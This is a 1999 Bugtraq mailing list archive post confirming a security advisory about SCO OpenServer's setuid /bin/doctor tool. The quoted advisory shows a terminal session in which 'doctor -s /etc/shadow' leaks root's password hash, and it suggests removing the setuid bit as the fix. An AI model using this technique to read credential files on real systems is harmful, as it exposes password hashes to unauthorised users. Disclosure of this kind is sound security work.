Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SCO 5.0.5 /bin/doctor local root comprimise

From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Wed, 8 Sep 1999 11:31:57 -0700

confirmed to run under 5.0.4 as well.

On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:

Greetings,


INFO:
 There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor 
script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
 Just chmod -s until SCO comes out with a fix.  Although I certianly won't be changing it back to suid root anytime 
soon.  If a hole like this exists, there are undoubtedly countless more lurking within.

Brock Tellier
Systems Administrator
Webley Systems


--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!
Previous By Date Next
Previous By Thread Next

Current thread: